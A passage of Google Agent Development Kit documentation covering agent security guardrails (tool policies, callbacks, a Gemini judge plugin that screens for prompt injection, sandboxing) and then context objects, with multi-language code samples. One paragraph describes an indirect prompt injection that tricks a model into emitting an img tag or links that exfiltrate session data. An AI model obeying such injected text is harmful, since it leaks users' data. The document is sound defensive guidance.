      String allowedTablesString =
          allowedPolicyTables.isEmpty() ? "(None defined)" : String.join(", ", allowedPolicyTables);
      return String.format(
          "Error: Query targets unauthorized tables.
Allowed: %s", allowedTablesString);
    }

    // Enforce SELECT-only queries when the policy asks for it.
    if (Boolean.TRUE.equals(queryToolPolicy.get("select_only"))) {
      if (!query.trim().toUpperCase().startsWith("SELECT")) {
        return "Error: Policy restricts queries to SELECT statements only.";
      }
    }
    // --- End Policy Enforcement ---

    System.out.printf("Executing validated query (hypothetical): %s%n", query);
    Map<String, Object> successResult = new HashMap<>();
    successResult.put("status", "success");
    successResult.put("results", Arrays.asList("result_item1", "result_item2"));
    return successResult;
  }
}
```

#### Built-in Gemini Safety Features

Gemini models come with built-in safety mechanisms that can be leveraged to improve content and brand safety.

- **Content safety filters**: [Content filters](https://cloud.google.com/vertex-ai/generative-ai/docs/multimodal/configure-safety-attributes) can help block the output of harmful content. They function independently from Gemini models as part of a layered defense against threat actors who attempt to jailbreak the model. Gemini models on Vertex AI use two types of content filters:
  - **Non-configurable safety filters** automatically block outputs containing prohibited content, such as child sexual abuse material (CSAM) and personally identifiable information (PII).
  - **Configurable content filters** allow you to define blocking thresholds in four harm categories (hate speech, harassment, sexually explicit, and dangerous content) based on probability and severity scores. These filters are off by default, but you can configure them according to your needs.
- **System instructions for safety**: [System instructions](https://cloud.google.com/vertex-ai/generative-ai/docs/multimodal/safety-system-instructions) for Gemini models in Vertex AI provide direct guidance to the model on how to behave and what type of content to generate. By providing specific instructions, you can proactively steer the model away from generating undesirable content to meet your organization’s unique needs.
  You can craft system instructions to define content safety guidelines, such as prohibited and sensitive topics and disclaimer language, as well as brand safety guidelines to ensure the model's outputs align with your brand's voice, tone, values, and target audience.

While these measures are robust against content safety risks, you need additional checks to reduce agent misalignment, unsafe actions, and brand safety risks.

#### Callbacks and Plugins for Security Guardrails

Callbacks provide a simple, agent-specific method for adding pre-validation to tool and model I/O, whereas plugins offer a reusable solution for implementing general security policies across multiple agents.

When modifications to the tools to add guardrails aren't possible, the [**`Before Tool Callback`**](https://google.github.io/adk-docs/callbacks/types-of-callbacks/#before-tool-callback) function can be used to add pre-validation of calls. The callback has access to the agent's state, the requested tool and parameters. This approach is very general and can even be used to create a common library of reusable tool policies. However, it might not be applicable for all tools if the information to enforce the guardrails isn't directly visible in the parameters.
```py
from typing import Any, Dict, Optional

from google.adk.agents import LlmAgent
from google.adk.tools.base_tool import BaseTool
from google.adk.tools.tool_context import ToolContext


# Hypothetical callback function
def validate_tool_params(
    tool: BaseTool,
    args: Dict[str, Any],
    tool_context: ToolContext,
) -> Optional[Dict]:  # Return type for before_tool_callback
    print(f"Callback triggered for tool: {tool.name}, args: {args}")

    # Example validation: Check if a required user ID from state matches an arg
    expected_user_id = tool_context.state.get("session_user_id")
    actual_user_id_in_args = args.get("user_id_param")  # Assuming tool takes 'user_id_param'

    if actual_user_id_in_args != expected_user_id:
        print("Validation Failed: User ID mismatch!")
        # Return a dictionary to prevent tool execution and provide feedback
        return {"error": "Tool call blocked: User ID mismatch."}

    # Return None to allow the tool call to proceed if validation passes
    print("Callback validation passed.")
    return None


# Hypothetical Agent setup
root_agent = LlmAgent(  # Use specific agent type
    model='gemini-2.0-flash',
    name='root_agent',
    instruction="...",
    before_tool_callback=validate_tool_params,  # Assign the callback
    tools=[
        # ... list of tool functions or Tool instances ...
        # e.g., query_tool_instance
    ]
)
```

```typescript
// Hypothetical callback function
function validateToolParams(
  {tool, args, context}: {
    tool: BaseTool,
    args: {[key: string]: any},
    context: ToolContext
  }
): {[key: string]: any} | undefined {
  console.log(`Callback triggered for tool: ${tool.name}, args: ${JSON.stringify(args)}`);

  // Example validation: Check if a required user ID from state matches an arg
  const expectedUserId = context.state.get("session_user_id");
  const actualUserIdInArgs = args["user_id_param"]; // Assuming tool takes 'user_id_param'

  if (actualUserIdInArgs !== expectedUserId) {
    console.log("Validation Failed: User ID mismatch!");
    // Return an object to prevent tool execution and provide feedback
    return {"error": `Tool call blocked: User ID mismatch.`};
  }

  // Return undefined to allow the tool call to proceed if validation passes
  console.log("Callback validation passed.");
  return undefined;
}

// Hypothetical Agent setup
const rootAgent = new LlmAgent({
  model: 'gemini-2.5-flash',
  name: 'root_agent',
  instruction: "...",
  beforeToolCallback: validateToolParams, // Assign the callback
  tools: [
    // ... list of tool functions or Tool instances ...
    // e.g., queryToolInstance
  ]
});
```

```go
import (
	"fmt"

	"google.golang.org/adk/agent/llmagent" // used by the commented-out agent setup below
	"google.golang.org/adk/tool"
)

// Hypothetical callback function
func validateToolParams(
	ctx tool.Context,
	t tool.Tool,
	args map[string]any,
) (map[string]any, error) {
	fmt.Printf("Callback triggered for tool: %s, args: %v\n", t.Name(), args)

	// Example validation: Check if a required user ID from state matches an arg
	expectedUserIDVal, err := ctx.State().Get("session_user_id")
	if err != nil {
		// This is an unexpected failure, return an error.
return nil, fmt.Errorf("internal error: session_user_id not found in state: %w", err) } expectedUserID, ok := expectedUserIDVal.(string) if !ok { return nil, fmt.Errorf("internal error: session_user_id in state is not a string, got %T", expectedUserIDVal) } actualUserIDInArgs, exists := args["user_id_param"] if !exists { // Handle case where user_id_param is not in args fmt.Println("Validation Failed: user_id_param missing from arguments!") return map[string]any{"error": "Tool call blocked: user_id_param missing from arguments."}, nil } actualUserID, ok := actualUserIDInArgs.(string) if !ok { // Handle case where user_id_param is not a string fmt.Println("Validation Failed: user_id_param is not a string!") return map[string]any{"error": "Tool call blocked: user_id_param is not a string."}, nil } if actualUserID != expectedUserID { fmt.Println("Validation Failed: User ID mismatch!") // Return a map to prevent tool execution and provide feedback to the model. // This is not a Go error, but a message for the agent. 
		return map[string]any{"error": "Tool call blocked: User ID mismatch."}, nil
	}

	// Return nil, nil to allow the tool call to proceed if validation passes
	fmt.Println("Callback validation passed.")
	return nil, nil
}

// Hypothetical Agent setup
// rootAgent, err := llmagent.New(llmagent.Config{
// 	Model: "gemini-2.0-flash",
// 	Name: "root_agent",
// 	Instruction: "...",
// 	BeforeToolCallbacks: []llmagent.BeforeToolCallback{validateToolParams},
// 	Tools: []tool.Tool{queryToolInstance},
// })
```

```java
// Hypothetical callback function
public Optional<Map<String, Object>> validateToolParams(
    CallbackContext callbackContext,
    Tool baseTool,
    Map<String, Object> input,
    ToolContext toolContext) {

  System.out.printf("Callback triggered for tool: %s, Args: %s%n", baseTool.name(), input);

  // Example validation: Check if a required user ID from state matches an input parameter
  Object expectedUserId = callbackContext.state().get("session_user_id");
  Object actualUserIdInput = input.get("user_id_param"); // Assuming tool takes 'user_id_param'

  // Objects.equals is null-safe, so a missing argument does not throw a NullPointerException.
  if (!java.util.Objects.equals(actualUserIdInput, expectedUserId)) {
    System.out.println("Validation Failed: User ID mismatch!");
    // Return a non-empty Optional to prevent tool execution and provide feedback
    return Optional.of(Map.of("error", "Tool call blocked: User ID mismatch."));
  }

  // Return an empty Optional to allow the tool call to proceed if validation passes
  System.out.println("Callback validation passed.");
  return Optional.empty();
}

// Hypothetical Agent setup
public void runAgent() {
  LlmAgent agent =
      LlmAgent.builder()
          .model("gemini-2.0-flash")
          .name("AgentWithBeforeToolCallback")
          .instruction("...")
          .beforeToolCallback(this::validateToolParams) // Assign the callback
          .tools(anyToolToUse) // Define the tool to be used
          .build();
}
```

However, when adding security guardrails to your agent applications, plugins are the recommended approach for implementing policies that are not specific to a single agent.
Plugins are designed to be self-contained and modular, allowing you to create individual plugins for specific security policies and apply them globally at the runner level. This means that a security plugin can be configured once and applied to every agent that uses the runner, ensuring consistent security guardrails across your entire application without repetitive code.

Some examples include:

- **Gemini as a Judge Plugin**: This plugin uses Gemini Flash Lite to evaluate user inputs, tool inputs and outputs, and the agent's responses for appropriateness, prompt injection, and jailbreak attempts. The plugin configures Gemini to act as a safety filter that mitigates content safety, brand safety, and agent misalignment risks. It passes user input, tool input and output, and model output to Gemini Flash Lite, which decides whether the content is safe or unsafe. If Gemini decides the input is unsafe, the agent returns a predetermined response: "Sorry I cannot help with that. Can I help you with something else?".
- **Model Armor Plugin**: A plugin that queries the Model Armor API to check for potential content safety violations at specified points of agent execution. Similar to the *Gemini as a Judge* plugin, if Model Armor finds matches of harmful content, it returns a predetermined response to the user.
- **PII Redaction Plugin**: A specialized plugin designed for the [Before Tool Callback](/adk-docs/plugins/#tool-callbacks) that redacts personally identifiable information before it’s processed by a tool or sent to an external service.

### Sandboxed Code Execution

Code execution is a special tool with extra security implications: sandboxing must be used to prevent model-generated code from compromising the local environment and creating security issues. Google and the ADK provide several options for safe code execution.
[Vertex Gemini Enterprise API code execution feature](https://cloud.google.com/vertex-ai/generative-ai/docs/multimodal/code-execution-api) enables agents to take advantage of sandboxed code execution server-side by enabling the `tool_execution` tool. For code performing data analysis, you can use the [Code Executor](/adk-docs/tools/gemini-api/code-execution/) tool in ADK to call the [Vertex Code Interpreter Extension](https://cloud.google.com/vertex-ai/generative-ai/docs/extensions/code-interpreter).

If none of these options satisfy your requirements, you can build your own code executor using the building blocks provided by the ADK. We recommend creating execution environments that are hermetic: no network connections or API calls are permitted, to avoid uncontrolled data exfiltration, and data is fully cleaned up between executions, to avoid cross-user exfiltration concerns.

### Evaluations

See [Evaluate Agents](https://google.github.io/adk-docs/evaluate/index.md).

### VPC-SC Perimeters and Network Controls

If you are executing your agent within a VPC-SC perimeter, all API calls will only manipulate resources within the perimeter, reducing the chance of data exfiltration.

However, identity and perimeters only provide coarse controls around agent actions. Tool-use guardrails mitigate such limitations, and give more power to agent developers to finely control which actions to allow.

### Other Security Risks

#### Always Escape Model-Generated Content in UIs

Care must be taken when agent output is visualized in a browser: if HTML or JS content isn't properly escaped in the UI, the text returned by the model could be executed, leading to data exfiltration. For example, an indirect prompt injection can trick a model into including an img tag that causes the browser to send the session content to a third-party site, or into constructing URLs that, if clicked, send data to external sites.
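
As a minimal sketch of this kind of escaping, assuming the UI is rendered from server-side Python and using only the standard library's `html.escape`, the snippet below neutralizes an injected image tag. The helper name `render_agent_reply` and the sample payload are hypothetical and are not part of ADK.

```python
import html


def render_agent_reply(model_text: str) -> str:
    """Wrap model output in a paragraph, escaping HTML metacharacters.

    Hypothetical helper for illustration only; it is not part of ADK.
    """
    # html.escape replaces &, < and > (and, with quote=True, " and ') with
    # entities, so the browser displays the text instead of parsing it as markup.
    return "<p>" + html.escape(model_text, quote=True) + "</p>"


# A reply carrying an injected image tag that would leak data if rendered raw.
malicious_reply = '<img src="https://attacker.example/leak?d=SESSION">'
safe_html = render_agent_reply(malicious_reply)
print(safe_html)
```

Escaping of this kind covers text placed inside HTML element content. URLs produced by the model would likely need separate validation, for example against an allowlist of schemes and hosts, before being rendered as links.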
Proper escaping of such content must ensure that model-generated text isn't interpreted as code by browsers.

# Components

# Context

Supported in ADK: Python v0.1.0, TypeScript v0.2.0, Go v0.1.0, Java v0.1.0

In the Agent Development Kit (ADK), "context" refers to the crucial bundle of information available to your agent and its tools during specific operations. Think of it as the necessary background knowledge and resources needed to handle a current task or conversation turn effectively.

Agents often need more than just the latest user message to perform well. Context is essential because it enables:

1. **Maintaining State:** Remembering details across multiple steps in a conversation (e.g., user preferences, previous calculations, items in a shopping cart). This is primarily managed through **session state**.
1. **Passing Data:** Sharing information discovered or generated in one step (like an LLM call or a tool execution) with subsequent steps. Session state is key here too.
1. **Accessing Services:** Interacting with framework capabilities like:
    - **Artifact Storage:** Saving or loading files or data blobs (like PDFs, images, configuration files) associated with the session.
    - **Memory:** Searching for relevant information from past interactions or external knowledge sources connected to the user.
    - **Authentication:** Requesting and retrieving credentials needed by tools to access external APIs securely.
1. **Identity and Tracking:** Knowing which agent is currently running (`agent.name`) and uniquely identifying the current request-response cycle (`invocation_id`) for logging and debugging.
1. **Tool-Specific Actions:** Enabling specialized operations within tools, such as requesting authentication or searching memory, which require access to the current interaction's details.

The central piece holding all this information together for a single, complete user-request-to-final-response cycle (an **invocation**) is the `InvocationContext`.
However, you typically won't create or manage this object directly. The ADK framework creates it when an invocation starts (e.g., via `runner.run_async`) and passes the relevant contextual information implicitly to your agent code, callbacks, and tools. ```python # Conceptual Pseudocode: How the framework provides context (Internal Logic) # runner = Runner(agent=my_root_agent, session_service=..., artifact_service=...) # user_message = types.Content(...) # session = session_service.get_session(...) # Or create new # --- Inside runner.run_async(...) --- # 1. Framework creates the main context for this specific run # invocation_context = InvocationContext( # invocation_id="unique-id-for-this-run", # session=session, # user_content=user_message, # agent=my_root_agent, # The starting agent # session_service=session_service, # artifact_service=artifact_service, # memory_service=memory_service, # # ... other necessary fields ... # ) # # 2. Framework calls the agent's run method, passing the context implicitly # (The agent's method signature will receive it, e.g., runAsyncImpl(InvocationContext invocationContext)) # await my_root_agent.run_async(invocation_context) # --- End Internal Logic --- # # As a developer, you work with the context objects provided in method arguments. ``` ```typescript /* Conceptual Pseudocode: How the framework provides context (Internal Logic) */ const runner = new InMemoryRunner({ agent: myRootAgent }); const session = await runner.sessionService.createSession({ ... }); const userMessage = createUserContent(...); // --- Inside runner.runAsync(...) --- // 1. Framework creates the main context for this specific run const invocationContext = new InvocationContext({ invocationId: "unique-id-for-this-run", session: session, userContent: userMessage, agent: myRootAgent, // The starting agent sessionService: runner.sessionService, pluginManager: runner.pluginManager, // ... other necessary fields ... }); // // 2. 
// Framework calls the agent's run method, passing the context implicitly
await myRootAgent.runAsync(invocationContext);
// --- End Internal Logic ---

// As a developer, you work with the context objects provided in method arguments.
```

```go
/* Conceptual Pseudocode: How the framework provides context (Internal Logic) */
sessionService := session.InMemoryService()

r, err := runner.New(runner.Config{
    AppName:        appName,
    Agent:          myAgent,
    SessionService: sessionService,
})
if err != nil {
    log.Fatalf("Failed to create runner: %v", err)
}

s, err := sessionService.Create(ctx, &session.CreateRequest{
    AppName: appName,
    UserID:  userID,
})
if err != nil {
    log.Fatalf("FATAL: Failed to create session: %v", err)
}

scanner := bufio.NewScanner(os.Stdin)
for {
    fmt.Print("\nYou > ")
    if !scanner.Scan() {
        break
    }
    userInput := scanner.Text()
    if strings.EqualFold(userInput, "quit") {
        break
    }
    userMsg := genai.NewContentFromText(userInput, genai.RoleUser)
    events := r.Run(ctx, s.Session.UserID(), s.Session.ID(), userMsg, agent.RunConfig{
        StreamingMode: agent.StreamingModeNone,
    })
    fmt.Print("\nAgent > ")
    for event, err := range events {
        if err != nil {
            log.Printf("ERROR during agent execution: %v", err)
            break
        }
        // Skip events that carry no content parts
        if event.Content != nil && len(event.Content.Parts) > 0 {
            fmt.Print(event.Content.Parts[0].Text)
        }
    }
}
```

```java
/* Conceptual Pseudocode: How the framework provides context (Internal Logic) */
InMemoryRunner runner = new InMemoryRunner(agent);
Session session = runner
    .sessionService()
    .createSession(runner.appName(), USER_ID, initialState, SESSION_ID)
    .blockingGet();

try (Scanner scanner = new Scanner(System.in, StandardCharsets.UTF_8)) {
  while (true) {
    System.out.print("\nYou > ");
    String userInput = scanner.nextLine();
    if ("quit".equalsIgnoreCase(userInput)) {
      break;
    }
    Content userMsg = Content.fromParts(Part.fromText(userInput));
    Flowable<Event> events = runner.runAsync(session.userId(), session.id(), userMsg);
    System.out.print("\nAgent > ");
    events.blockingForEach(event -> System.out.print(event.stringifyContent()));
  }
}
```

## The Different types of Context

While `InvocationContext` acts as the comprehensive internal container, ADK provides specialized context objects tailored to specific situations. This ensures you have the right tools and permissions for the task at hand without needing to handle the full complexity of the internal context everywhere. Here are the different "flavors" you'll encounter:

1. **`InvocationContext`**
    - **Where Used:** Received as the `ctx` argument directly within an agent's core implementation methods (`_run_async_impl`, `_run_live_impl`).
    - **Purpose:** Provides access to the *entire* state of the current invocation. This is the most comprehensive context object.
    - **Key Contents:** Direct access to `session` (including `state` and `events`), the current `agent` instance, `invocation_id`, initial `user_content`, references to configured services (`artifact_service`, `memory_service`, `session_service`), and fields related to live/streaming modes.
    - **Use Case:** Primarily used when the agent's core logic needs direct access to the overall session or services, though state and artifact interactions are often delegated to callbacks/tools, which use their own contexts. Also used to control the invocation itself (e.g., setting `ctx.end_invocation = True`).

    ```python
    # Pseudocode: Agent implementation receiving InvocationContext
    from typing import AsyncGenerator

    from google.adk.agents import BaseAgent
    from google.adk.agents.invocation_context import InvocationContext
    from google.adk.events import Event

    class MyAgent(BaseAgent):
        async def _run_async_impl(self, ctx: InvocationContext) -> AsyncGenerator[Event, None]:
            # Direct access example
            agent_name = ctx.agent.name
            session_id = ctx.session.id
            print(f"Agent {agent_name} running in session {session_id} for invocation {ctx.invocation_id}")
            # ... agent logic using ctx ...
            yield  # ... event ...
    ```

    ```typescript
    // Pseudocode: Agent implementation receiving InvocationContext
    import { BaseAgent, InvocationContext, Event } from '@google/adk';

    class MyAgent extends BaseAgent {
      async *runAsyncImpl(ctx: InvocationContext): AsyncGenerator<Event> {
        // Direct access example
        const agentName = ctx.agent.name;
        const sessionId = ctx.session.id;
        console.log(`Agent ${agentName} running in session ${sessionId} for invocation ${ctx.invocationId}`);
        // ... agent logic using ctx ...
        yield; // ... event ...
      }
    }
    ```

    ```go
    import (
        "fmt"
        "iter"

        "google.golang.org/adk/agent"
        "google.golang.org/adk/session"
    )

    // Pseudocode: Agent implementation receiving InvocationContext
    type MyAgent struct {
    }

    func (a *MyAgent) Run(ctx agent.InvocationContext) iter.Seq2[*session.Event, error] {
        return func(yield func(*session.Event, error) bool) {
            // Direct access example
            agentName := ctx.Agent().Name()
            sessionID := ctx.Session().ID()
            fmt.Printf("Agent %s running in session %s for invocation %s\n", agentName, sessionID, ctx.InvocationID())
            // ... agent logic using ctx ...
            yield(&session.Event{Author: agentName}, nil)
        }
    }
    ```

    ```java
    // Pseudocode: Agent implementation receiving InvocationContext
    import com.google.adk.agents.BaseAgent;
    import com.google.adk.agents.InvocationContext;

    LlmAgent root_agent =
        LlmAgent.builder()
            .model("gemini-***")
            .name("sample_agent")
            .description("Answers user questions.")
            .instruction(
                """
                provide instruction for the agent here.
                """
            )
            .tools(sampleTool)
            .outputKey("YOUR_KEY")
            .build();

    ConcurrentMap<String, Object> initialState = new ConcurrentHashMap<>();
    initialState.put("YOUR_KEY", "");

    InMemoryRunner runner = new InMemoryRunner(root_agent);
    Session session = runner
        .sessionService()
        .createSession(runner.appName(), USER_ID, initialState, SESSION_ID)
        .blockingGet();

    try (Scanner scanner = new Scanner(System.in, StandardCharsets.UTF_8)) {
      while (true) {
        System.out.print("\nYou > ");
        String userInput = scanner.nextLine();
        if ("quit".equalsIgnoreCase(userInput)) {
          break;
        }
        Content userMsg = Content.fromParts(Part.fromText(userInput));
        Flowable<Event> events = runner.runAsync(session.userId(), session.id(), userMsg);
        System.out.print("\nAgent > ");
        events.blockingForEach(event -> System.out.print(event.stringifyContent()));
      }
    }

    // Inside a class that extends BaseAgent:
    protected Flowable<Event> runAsyncImpl(InvocationContext invocationContext) {
      // Direct access example
      String agentName = invocationContext.agent().name();
      String sessionId = invocationContext.session().id();
      String invocationId = invocationContext.invocationId();
      System.out.println("Agent " + agentName + " running in session " + sessionId + " for invocation " + invocationId);
      // ... agent logic using ctx ...
      return Flowable.empty(); // Placeholder: emit the agent's events here
    }
    ```

1. **`ReadonlyContext`**
    - **Where Used:** Provided in scenarios where only read access to basic information is needed and mutation is disallowed (e.g., `InstructionProvider` functions). It's also the base class for other contexts.
    - **Purpose:** Offers a safe, read-only view of fundamental contextual details.
    - **Key Contents:** `invocation_id`, `agent_name`, and a read-only *view* of the current `state`.
    ```python
    # Pseudocode: Instruction provider receiving ReadonlyContext
    from google.adk.agents.readonly_context import ReadonlyContext

    def my_instruction_provider(context: ReadonlyContext) -> str:
        # Read-only access example (state is a property, not a method)
        user_tier = context.state.get("user_tier", "standard")  # Can read state
        # context.state['new_key'] = 'value'  # This would typically cause an error or be ineffective
        return f"Process the request for a {user_tier} user."
    ```

    ```typescript
    // Pseudocode: Instruction provider receiving ReadonlyContext
    import { ReadonlyContext } from '@google/adk';

    function myInstructionProvider(context: ReadonlyContext): string {
      // Read-only access example
      // The state object is read-only
      const userTier = context.state.get('user_tier') ?? 'standard';
      // context.state.set('new_key', 'value'); // This would fail or throw an error
      return `Process the request for a ${userTier} user.`;
    }
    ```

    ```go
    import (
        "fmt"

        "google.golang.org/adk/agent"
    )

    // Pseudocode: Instruction provider receiving ReadonlyContext
    func myInstructionProvider(ctx agent.ReadonlyContext) (string, error) {
        // Read-only access example
        userTier, err := ctx.ReadonlyState().Get("user_tier")
        if err != nil {
            userTier = "standard" // Default value
        }
        // ctx.ReadonlyState() has no Set method since State() is read-only.
        return fmt.Sprintf("Process the request for a %v user.", userTier), nil
    }
    ```

    ```java
    // Pseudocode: Instruction provider receiving ReadonlyContext
    import com.google.adk.agents.ReadonlyContext;

    public String myInstructionProvider(ReadonlyContext context) {
      // Read-only access example
      String userTier = (String) context.state().getOrDefault("user_tier", "standard");
      // context.state().put("new_key", "value"); // This would typically cause an error
      return "Process the request for a " + userTier + " user.";
    }
    ```

1. **`CallbackContext`**
    - **Where Used:** Passed as `callback_context` to agent lifecycle callbacks (`before_agent_callback`, `after_agent_callback`) and model interaction callbacks (`before_model_callback`, `after_model_callback`).
    - **Purpose:** Facilitates inspecting and modifying state, interacting with artifacts, and accessing invocation details *specifically within callbacks*.
    - **Key Capabilities (Adds to `ReadonlyContext`):**
        - **Mutable `state` Property:** Allows reading *and writing* to session state. Changes made here (`callback_context.state['key'] = value`) are tracked and associated with the event generated by the framework after the callback.
        - **Artifact Methods:** `load_artifact(filename)` and `save_artifact(filename, part)` methods for interacting with the configured `artifact_service`.
        - Direct `user_content` access.

    ```python
    # Pseudocode: Callback receiving CallbackContext
    from typing import Optional

    from google.adk.agents.callback_context import CallbackContext
    from google.adk.models import LlmRequest, LlmResponse

    def my_before_model_cb(callback_context: CallbackContext, llm_request: LlmRequest) -> Optional[LlmResponse]:
        # Read/Write state example
        call_count = callback_context.state.get("model_calls", 0)
        callback_context.state["model_calls"] = call_count + 1  # Modify state

        # Optionally load an artifact
        # config_part = callback_context.load_artifact("model_config.json")
        print(f"Preparing model call #{call_count + 1} for invocation {callback_context.invocation_id}")
        return None  # Allow model call to proceed
    ```

    ```typescript
    // Pseudocode: Callback receiving CallbackContext
    import { CallbackContext, LlmRequest } from '@google/adk';
    import { Content } from '@google/genai';

    function myBeforeModelCb(callbackContext: CallbackContext, request: LlmRequest): Content | undefined {
      // Read/Write state example
      const callCount = (callbackContext.state.get('model_calls') as number) || 0;
      callbackContext.state.set('model_calls', callCount + 1); // Modify state

      // Optionally load an artifact (loadArtifact is async, so the callback would need to be async too)
      // const configPart = await callbackContext.loadArtifact('model_config.json');
      console.log(`Preparing model call #${callCount + 1} for invocation ${callbackContext.invocationId}`);
      return undefined; // Allow model call to proceed
    }
    ```

    ```go
    import (
        "fmt"

        "google.golang.org/adk/agent"
        "google.golang.org/adk/model"
    )

    // Pseudocode: Callback receiving CallbackContext
    func myBeforeModelCb(ctx agent.CallbackContext, req *model.LLMRequest) (*model.LLMResponse, error) {
        // Read/Write state example
        callCount, err := ctx.State().Get("model_calls")
        if err != nil {
            callCount = 0 // Default value
        }
        newCount := callCount.(int) + 1
        if err := ctx.State().Set("model_calls", newCount); err != nil {
            return nil, err
        }

        // Optionally load an artifact
        // configPart, err := ctx.Artifacts().Load("model_config.json")
        fmt.Printf("Preparing model call #%d for invocation %s\n", newCount, ctx.InvocationID())
        return nil, nil // Allow model call to proceed
    }
    ```

    ```java
    // Pseudocode: Callback receiving CallbackContext
    import com.google.adk.agents.CallbackContext;
    import com.google.adk.models.LlmRequest;
    import com.google.adk.models.LlmResponse;
    import io.reactivex.rxjava3.core.Maybe;

    public Maybe<LlmResponse> myBeforeModelCb(CallbackContext callbackContext, LlmRequest request) {
      // Read/Write state example
      int callCount = (int) callbackContext.state().getOrDefault("model_calls", 0);
      callbackContext.state().put("model_calls", callCount + 1); // Modify state

      // Optionally load an artifact
      // Maybe<Part> configPart = callbackContext.loadArtifact("model_config.json");
      System.out.println("Preparing model call " + (callCount + 1));
      return Maybe.empty(); // Allow model call to proceed
    }
    ```

1. **`ToolContext`**
    - **Where Used:** Passed as `tool_context` to the functions backing `FunctionTool`s and to tool execution callbacks (`before_tool_callback`, `after_tool_callback`).
- **Purpose:** Provides everything `CallbackContext` does, plus specialized methods essential for tool execution, like handling authentication, searching memory, and listing artifacts. - **Key Capabilities (Adds to `CallbackContext`):** - **Authentication Methods:** `request_credential(auth_config)` to trigger an auth flow, and `get_auth_response(auth_config)` to retrieve credentials provided by the user/system. - **Artifact Listing:** `list_artifacts()` to discover available artifacts in the session. - **Memory Search:** `search_memory(query)` to query the configured `memory_service`. - **`function_call_id` Property:** Identifies the specific function call from the LLM that triggered this tool execution, crucial for linking authentication requests or responses back correctly. - **`actions` Property:** Direct access to the `EventActions` object for this step, allowing the tool to signal state changes, auth requests, etc. ```python # Pseudocode: Tool function receiving ToolContext from google.adk.tools import ToolContext from typing import Dict, Any # Assume this function is wrapped by a FunctionTool def search_external_api(query: str, tool_context: ToolContext) -> Dict[str, Any]: api_key = tool_context.state.get("api_key") if not api_key: # Define required auth config # auth_config = AuthConfig(...) # tool_context.request_credential(auth_config) # Request credentials # Use the 'actions' property to signal the auth request has been made # tool_context.actions.requested_auth_configs[tool_context.function_call_id] = auth_config return {"status": "Auth Required"} # Use the API key... print(f"Tool executing for query '{query}' using API key. 
Invocation: {tool_context.invocation_id}") # Optionally search memory or list artifacts # relevant_docs = tool_context.search_memory(f"info related to {query}") # available_files = tool_context.list_artifacts() return {"result": f"Data for {query} fetched."} ``` ```typescript // Pseudocode: Tool function receiving ToolContext import { ToolContext } from '@google/adk'; // __Assume this function is wrapped by a FunctionTool__ function searchExternalApi(query: string, toolContext: ToolContext): { [key: string]: string } { const apiKey = toolContext.state.get('api_key') as string; if (!apiKey) { // Define required auth config // const authConfig = new AuthConfig(...); // toolContext.requestCredential(authConfig); // Request credentials // The 'actions' property is now automatically updated by requestCredential return { status: 'Auth Required' }; } // Use the API key... console.log(`Tool executing for query '${query}' using API key. Invocation: ${toolContext.invocationId}`); // Optionally search memory or list artifacts // Note: accessing services like memory/artifacts is typically async in TS, // so you would need to mark this function 'async' if you reused them. // toolContext.searchMemory(`info related to ${query}`).then(...) // toolContext.listArtifacts().then(...) return { result: `Data for ${query} fetched.` }; } ``` ```go import "google.golang.org/adk/tool" // Pseudocode: Tool function receiving ToolContext type searchExternalAPIArgs struct { Query string `json:"query" jsonschema:"The query to search for."` } func searchExternalAPI(tc tool.Context, input searchExternalAPIArgs) (string, error) { apiKey, err := tc.State().Get("api_key") if err != nil || apiKey == "" { // In a real scenario, you would define and request credentials here. // This is a conceptual placeholder. return "", fmt.Errorf("auth required") } // Use the API key... fmt.Printf("Tool executing for query '%s' using API key. 
Invocation: %s\n", input.Query, tc.InvocationID())

        // Optionally search memory or list artifacts
        // relevantDocs, _ := tc.SearchMemory(tc, fmt.Sprintf("info related to %s", input.Query))
        // availableFiles, _ := tc.Artifacts().List()
        return fmt.Sprintf("Data for %s fetched.", input.Query), nil
    }
    ```

    ```java
    // Pseudocode: Tool function receiving ToolContext
    import com.google.adk.tools.ToolContext;
    import java.util.Map;

    // Assume this function is wrapped by a FunctionTool
    public Map<String, String> searchExternalApi(String query, ToolContext toolContext) {
      String apiKey = (String) toolContext.state().get("api_key");
      if (apiKey == null || apiKey.isEmpty()) {
        // Define required auth config
        // authConfig = AuthConfig(...);
        // toolContext.requestCredential(authConfig); // Request credentials
        // Use the 'actions' property to signal the auth request has been made
        // ...
        return Map.of("status", "Auth Required");
      }

      // Use the API key...
      System.out.println("Tool executing for query " + query + " using API key.");

      // Optionally list artifacts
      // Single<List<String>> availableFiles = toolContext.listArtifacts();

      return Map.of("result", "Data for " + query + " fetched");
    }
    ```

Understanding these different context objects and when to use them is key to effectively managing state, accessing services, and controlling the flow of your ADK application. The next section will detail common tasks you can perform using these contexts.

## Common Tasks Using Context

Now that you understand the different context objects, let's focus on how to use them for common tasks when building your agents and tools.

### Accessing Information

You'll frequently need to read information stored within the context.

- **Reading Session State:** Access data saved in previous steps or user/app-level settings. Use dictionary-like access on the `state` property.
```python # Pseudocode: In a Tool function from google.adk.tools import ToolContext def my_tool(tool_context: ToolContext, **kwargs): user_pref = tool_context.state.get("user_display_preference", "default_mode") api_endpoint = tool_context.state.get("app:api_endpoint") # Read app-level state if user_pref == "dark_mode": # ... apply dark mode logic ... pass print(f"Using API endpoint: {api_endpoint}") # ... rest of tool logic ... # Pseudocode: In a Callback function from google.adk.agents.callback_context import CallbackContext def my_callback(callback_context: CallbackContext, **kwargs): last_tool_result = callback_context.state.get("temp:last_api_result") # Read temporary state if last_tool_result: print(f"Found temporary result from last tool: {last_tool_result}") # ... callback logic ... ``` ```typescript // Pseudocode: In a Tool function import { ToolContext } from '@google/adk'; async function myTool(toolContext: ToolContext) { const userPref = toolContext.state.get('user_display_preference', 'default_mode'); const apiEndpoint = toolContext.state.get('app:api_endpoint'); // Read app-level state if (userPref === 'dark_mode') { // ... apply dark mode logic ... } console.log(`Using API endpoint: ${apiEndpoint}`); // ... rest of tool logic ... } // Pseudocode: In a Callback function import { CallbackContext } from '@google/adk'; function myCallback(callbackContext: CallbackContext) { const lastToolResult = callbackContext.state.get('temp:last_api_result'); // Read temporary state if (lastToolResult) { console.log(`Found temporary result from last tool: ${lastToolResult}`); } // ... callback logic ... 
    }
    ```

    ```go
    import (
        "fmt"

        "google.golang.org/adk/agent"
        "google.golang.org/adk/tool"
        "google.golang.org/genai"
    )

    // Pseudocode: In a Tool function
    type toolArgs struct {
        // Define tool-specific arguments here
    }

    type toolResults struct {
        // Define tool-specific results here
    }

    // Example tool function demonstrating state access
    func myTool(tc tool.Context, input toolArgs) (toolResults, error) {
        userPref, err := tc.State().Get("user_display_preference")
